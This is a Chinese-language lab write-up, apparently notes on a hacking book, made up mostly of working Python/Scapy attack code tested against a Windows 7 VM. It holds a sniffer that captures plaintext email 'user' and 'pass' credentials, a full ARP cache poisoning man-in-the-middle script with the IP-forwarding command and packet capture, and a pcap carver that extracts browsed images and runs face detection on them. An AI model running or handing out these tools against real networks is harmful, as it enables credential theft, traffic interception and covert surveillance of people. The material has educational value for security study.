1 窃取Email认证
代码:
from scapy.all import *
def packet_callback(packet):
if packet[TCP].payload:
mail_packet = str(packet[TCP].payload)
if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
print "[*] Server:%s" % packet[IP].dst
print "[*] %s" % packet[TCP].payload
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback,store=0)
测试:
在一个终端输入:(此处显示的user 名字是因为我先执行了下面那步,原始来说是没有的)
打开第二个终端,输入: user lebron(随便输一个名字)
然后输入:pass james(密码,用的假的所以登录不上)
2 利用Scapy进行ARP缓存投毒
准备:
攻击机:kali linux
被攻击机:windows7
需要知道被攻击机的ip地址和默认网关地址。
在Windows7机上输入ipconfig查看IP地址和默认网关地址,然后输入arp -a查看mac地址(投毒之后这个mac地址会改变)
查看Kali的Mac地址
在Kali上运行如下代码:
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "192.168.233.132"
gateway_ip = "192.168.233.2"
packet_count = 1000
conf.iface = interface
conf.verb = 0
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
print "[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Begining the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished"
return
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
# run the arp poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
# send the data to file
wrpcap('arper.pcap', packets)
# reset the settings
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
测试:
首先开启对网关和目标IP地址的流量进行转发的功能。在Kali虚拟机的终端输入:
echo 1 > /proc/sys/net/ipv4/ip_forward
然后运行以上代码:
期间Windows7要一直开机,不然会出现错误。
然后在Windows7上浏览些图片,为后面抓人像做基础。
然后查看Windows7的arp -a,会发现mac已经改成Kali上的mac地址:
试着查看输出的arper.pcap文件 (双击即可)
在Kali上默认用wireshark打开。
PS:打开时可能会遇到如下错误:
Lua: Error during loading: [string “/usr/share/wireshark/init.lua”]:46: dofile has been disabled due to running Wireshark as superuser. See http://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user.
解决:
终端运行:
nano /usr/share/wireshark/init.lua
然后会出现一个文本,找到划红线的地方,把false改成true(这里我已经改了),改完退出即可。(退出:ctrl+x,输入y,然后回车即可)
此时打开,pcap文件,可以看到:
抓到了被攻击机Windows7的活动。
3 处理PCAP文件
这一小节,是利用上面抓到的pcap文件,从中提取出浏览的图片,并把人脸标记出来。我没有成功,应该是这个pcap的问题,但是还是抓到了一个图标。。
代码如下:
import re
import zlib
import cv2
from scapy.all import *
pictures_directory = "./pictures"
faces_directory = "./faces"
pcap_file = "arper.pcap"
def face_detect(path,file_name):
img = cv2.imread(path)
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))
if len(rects) == 0:
return False
rects[:, 2:] += rects[:, :2]
# highlight the faces in the image
for x1,y1,x2,y2 in rects:
cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)
cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)
return True
def get_http_headers(http_payload):
try:
# split the headers off if it is HTTP traffic
headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
# break out the headers
headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
except:
return None
if "Content-Type" not in headers:
return None
return headers
def extract_image(headers,http_payload):
image = None
image_type = None
try:
if "image" in headers['Content-Type']:
# grab the image type and image body
image_type = headers['Content-Type'].split("/")[1]
image = http_payload[http_payload.index("\r\n\r\n")+4:]
# if we detect compression decompress the image
try:
if "Content-Encoding" in headers.keys():
if headers['Content-Encoding'] == "gzip":
image = zlib.decompress(image,16+zlib.MAX_WBITS)
elif headers['Content-Encoding'] == "deflate":
image = zlib.decompress(image)
except:
pass
except:
return None,None
return image,image_type
def http_assembler(pcap_file):
carved_images = 0
faces_detected = 0
a = rdpcap(pcap_file)
sessions = a.sessions()
for session in sessions:
http_payload = ""
for packet in sessions[session]:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
# reassemble the stream into a single buffer
http_payload += str(packet[TCP].payload)
except:
pass
headers = get_http_headers(http_payload)
if headers is None:
continue
image,image_type = extract_image(headers,http_payload)
if image is not None and image_type is not None:
# store the image
file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
fd = open("%s/%s" % (pictures_directory,file_name),"wb")
fd.write(image)
fd.close()
carved_images += 1
# now attempt face detection
try:
result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)
if result is True:
faces_detected += 1
except:
pass
return carved_images, faces_detected
carved_images, faces_detected = http_assembler(pcap_file)
print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected
./表示在home文件夹下。
然后在终端测试:
首先安装openCV:
apt-get install python-opencv python-numpy python-scipy
获取人脸检测分类算法的训练文件:
wget http://eclecti.cc/files/2008/03/haarcascade_frontalface_alt.xml
接着在终端输入:
mkdir pictures
mkdir faces
这一步我没按书上来,我是直接在Home文件夹下新建了这两个文件夹。pictures文件夹用来装抓到的图片,faces文件夹用来装识别的人脸。
运行代码:
没抓到人脸,只有一张图片,打开pictures文件夹:
这是必应的一个图标。。那么多图片它为什么会抓到这个玩意儿。。。迷。。。